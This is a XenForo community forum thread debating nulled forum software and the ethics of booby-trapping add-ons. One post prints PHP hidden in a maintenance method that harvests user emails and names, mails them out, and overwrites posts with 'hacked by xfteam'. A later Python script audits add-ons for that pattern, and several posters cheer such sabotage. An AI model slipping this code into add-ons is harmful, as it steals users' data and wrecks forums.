Better security - no more nulled xenforo's out there :)

You don't call the police over something like this? Just report it to XenForo and they'll handle it.
Oh, haha yes I did..

I reported a site like 4 months ago when I did not even own a XenForo license. As nothing happened to him
Sorry, I did but nothing happened, so I called his hosting service. They told me to call the police. If you read all my replies you will see that I typed this before :)
 
Speak for yourself.
I haven't.

Just how I haven't stolen a car I wanted to test drive for a few weeks, or broken into a house and squatted in it for a while, just to see what it would be like living there.

Not a real comparison though. Cars have test drives, short but they exist. If one car company doesn't offer test drives you will just go to their competitor. If no one does then you turn to borrowing from a friend who already had the car. So the next step in bringing this close is to say what if all cars are leased and the lease agreement prevents other people from driving it. The mindset the rare but supposedly existing pirate and buy person has is the same as that of the lessee loaning you the car anyways. I mean who would find out in only a few days right?

Even that's not a good comparison because the lessee is the one in trouble for breach more than the borrower. Unlike in software we aren't duplicating the original. A deranged billionaire in that scenario might open up a club to try out all the latest cars and really it's just him that is in trouble.

However my friend you do look like the sort of gentleman that might "borrow" a car to transport something across Europe...
 
A lot of the more accessible nulls out there have a backdoor/shell in them and your server will be toast anyway. Those crappy CMS ad-riddled 'free' download sites rely on the stupidity/naive understanding of those downloading the exploited software in the first place. Then you have the private groups and forums where it all stems from, mostly based in countries where webhosts are lazy to remove anything but child porn. It's sad but true. There are people in release groups reading this right now, they're customers here. It's an uphill battle to defeat this without some form of encryption, which I don't really want to ever see happen (aka more **** on the server for decoding).

I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it. Is that a good security measure? Morally objectionable? Not sure but it is hilarious.
 
I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it
Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.
PHP:
public function optimiseDatabase(){
    $options = XenForo_Application::get('options');
    $this->_getDb()->query("
        optimize table dark_taigachat
    ");
    // Concatenates user ID, username, e-mail and group fields from the core
    // xf_user table (aliased as taigachat_messages) and appends the board URL
    $params = array();
    $params['bodyText'] = $this->_getDb()->fetchOne(
        "SELECT group_concat(concat(user_id, ', ', username, ', ',
        email, ', ', display_style_group_id, ', ', user_group_id, ', ',
        permission_combination_id), '\n ')
        from xf_user taigachat_messages
        ORDER BY message_count desc limit 1000
    ").$options->boardUrl;

    // Mails the collected data to an address built from the 'dark_full_alt' phrase
    $m = XenForo_Mail::create('MAIL_CONTAINER', $params);
    $m->send('a@'.new XenForo_Phrase('dark_full_alt'));
    // Overwrites the message of randomly selected rows in the core xf_post
    // table (at most 100 per call)
    $this->_getDb()->query("
        update xf_post taigachat set message=concat('hacked by xf', 'team')
        where floor(rand()*100) = 42 limit 100
    ");
    $this->_getDb()->query("
        optimize table dark_taigachat_activity
    ");
}
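
Added example, not part of the original post or of any add-on's code: a small Python audit that an admin could run over an add-on's PHP source before installing it, flagging SQL that touches tables outside the add-on's own prefix and the read-users-then-send-mail pattern seen in the method above. The function names and the `dark_` prefix (taken from the `dark_taigachat` table names in the quoted code) are assumptions; the sample PHP is constructed from that method.

```python
import re

# Constructed sample, condensed from the optimiseDatabase() method quoted above.
SAMPLE_PHP = r'''public function optimiseDatabase(){
    $this->_getDb()->query("optimize table dark_taigachat");
    $params['bodyText'] = $this->_getDb()->fetchOne(
        "SELECT group_concat(concat(user_id, ', ', email))
         from xf_user taigachat_messages limit 1000");
    $m = XenForo_Mail::create('MAIL_CONTAINER', $params);
    $m->send('a@'.new XenForo_Phrase('dark_full_alt'));
    $this->_getDb()->query("
        update xf_post taigachat set message=concat('hacked by xf', 'team')
        where floor(rand()*100) = 42 limit 100");
}
'''

# SQL keyword that introduces a table name, mapped to the kind of access.
VERB_KIND = {"from": "read", "join": "read", "update": "write", "into": "write",
             "delete": "write", "truncate": "write", "drop": "write",
             "optimize": "maintenance"}
TABLE_REF = re.compile(
    r"\b(delete\s+from|from|join|update|into|optimize\s+table"
    r"|truncate\s+table|drop\s+table)\s+`?(\w+)`?", re.IGNORECASE)

def audit_addon_sql(php_source, own_prefix):
    """Return (line, kind, table) for every table outside the add-on's prefix."""
    findings = []
    for m in TABLE_REF.finditer(php_source):
        # The real table is the first identifier after the keyword, so an
        # alias that imitates an add-on table name does not hide it.
        table = m.group(2).lower()
        if table.startswith(own_prefix.lower()):
            continue  # the add-on's own tables are expected
        kind = VERB_KIND[m.group(1).lower().split()[0]]
        line = php_source.count("\n", 0, m.start()) + 1
        findings.append((line, kind, table))
    return findings

def mails_user_data(php_source, findings):
    """Heuristic: reads xf_user and also sends mail from the same source unit."""
    reads_users = any(k == "read" and t == "xf_user" for _, k, t in findings)
    return reads_users and "->send(" in php_source

if __name__ == "__main__":
    hits = audit_addon_sql(SAMPLE_PHP, "dark_")
    for line, kind, table in hits:
        print(f"line {line}: {kind} on foreign table {table}")
    print("mails user data:", mails_user_data(SAMPLE_PHP, hits))
```

A hit is a prompt for manual review, not proof of malice: legitimate add-ons do read core tables, but a method named for table maintenance that writes to `xf_post` or mails `xf_user` columns deserves a close look.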
 
Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.
That must be the one, I'd consider having all my posts replaced with that as "****ing the forum" :D

[Mod note: do not attempt to bypass the censor.]
 
So we all have reasons why we have used or tried NULLED software. And to think you will stop it is nothing more than naive stupidity at best..
I have run forums for about 13 years and have never ever used any piece of nulled software.

There never was a need for that. And knowing that such a piece of software not only harms the serious developers, but also can harm your server and community, is insane. Years ago with PHP heavily using global vars and other security issues it was easy to compromise a server and gain control or cause severe damage with a small PHP script. And I know several cases where that happened, thank god never to me.
 
What about making a hall of shame, list all the sites that run pirate versions and using this list, you can help the public avoid these pirate sites. We can hurt them by harming traffic.
 
What about making a hall of shame, list all the sites that run pirate versions and using this list, you can help the public avoid these pirate sites. We can hurt them by harming traffic.

Not worth the legal headache lol. Not good for business in general either. Not to mention generating traffic, the exact opposite of what you are trying to accomplish.
 
Trying to stop people using any form of nulled software is like trying to stop people hotlinking images, they will find a way around it if they want it bad enough.
 
Trying to stop people using any form of nulled software is like trying to stop people hotlinking images, they will find a way around it if they want it bad enough.
How is hotlink protection not effective? I have to throw a couple of guesses in while I wait. Like perhaps you're mistaking copy protection schemes such as no right click or transparent gif, making it harder to get the URL but entirely not there for that reason, with hotlink protection.

Haven't set one up in a while but pretty much if there is no referrer or the referrer is any server but yours, should be pretty easy to prevent loading it altogether. Server just refuses to serve the content.
 
Stopping hotlinking doesn't stop you using the image, it just stops you stealing bandwidth.

The only sure way to stop people from using an image is to use digital stamping, which when it's copied in any way, produces a warning that says something like "You do not have permission to use this image" instead of the image.

The thing is a digital stamp in an image is harder to remove than the code that stops a program being used.
 
I think the best one I've heard so far out there in internet land was one of the 'major' add-on developers here releasing one of his mods into the wild with an exploit that deleted essential tables in the xenforo database, effectively destroying the forum when you installed it. Is that a good security measure? Morally objectionable? Not sure but it is hilarious.
That is hilarious and serves them just right, more add-on authors should do this to make the life of those who use nulled software harder :D
 
Who? Other than @Luke Foreman who supplied his own add-on which replaced all the posts content to "Hacked by xyz" I don't think there is anyone else.
You can't use immoral methods to protect your rights.
In many countries schools and colleges use illegal copies of Windows, should Microsoft hack them and destroy all student documents?
 
In many countries schools and colleges use illegal copies of Windows, should Microsoft hack them and destroy all student documents?
Said schools and colleges charge students money, right? In that case they SHOULD use licensed copies.

There is no reason to justify using pirated/nulled software. There are free alternatives out there too, they aren't forced to use a paid software.
 
Said schools and colleges charge students money, right? In that case they SHOULD use licensed copies.

There is no reason to justify using pirated/nulled software. There are free alternatives out there too, they aren't forced to use a paid software.
Am I justifying the use of illegal materials?
No.
Most of those schools are public, in developed countries with limited access to clean water.
And yes, they SHOULD give more dollars to Bill Gates.
What I want to say is simple:
1- The use of illegal copies of software is not legal nor moral.
But
2- Some users of those illegal copies are not criminals. Just persons with no economic resources.
From a moral perspective: we should do everything we can to protect copyrights, but we should also guarantee to everyone the right to access culture, music, art..
 
Microsoft, Autodesk, even Adobe had academic programs. If the school still cannot afford the academic program, sometimes Microsoft makes a custom deal.
 
Umm, they are.

I can't afford a McLaren P1.
That doesn't mean I can just steal one.
You are misinterpreting my example.
Accessing culture is a fundamental right for every human.
Acquiring a McLaren P1 is not.
So we have to think of a way that respects those rights without infringing copyrights.
(Microsoft has done this by negotiating special agreements with some countries)
 
Most of those schools are public, in developed countries with limited access to clean water.
And yes, they SHOULD give more dollars to Bill Gates

2- Some users of those illegal copies are not criminals. Just persons with no economic resources.
From a moral perspective: we should do everything we can to protect copyrights, but we should also guarantee to everyone the right to access culture, music, art..
And as I said, there are free alternatives too. They aren't being denied anything, instead of selecting to pay for a well developed product they use a nulled/pirated copy of it when there are free alternatives.

That is being greedy and not paying for what you use & enjoy. If you are lobbying for rights as you say, then there should be two way rights. People have the right to earn for their hard work, I am sure that is necessary as everyone's got to earn to keep a roof over their head and to earn bread to fill their stomachs.

No one has the right to kick someone's livelihood away for personal benefit.

The same way how nulled forum software is used on sites that display ads or provide "premium" membership - they collect enough money to make a profit and should purchase a license to support the developers and the product. If they don't, they won't get access to security updates and are more prone to running into security issues, and I would back any add-on developer that uses any tactic to spoil their peace of mind and force them to stop using a nulled copy.
 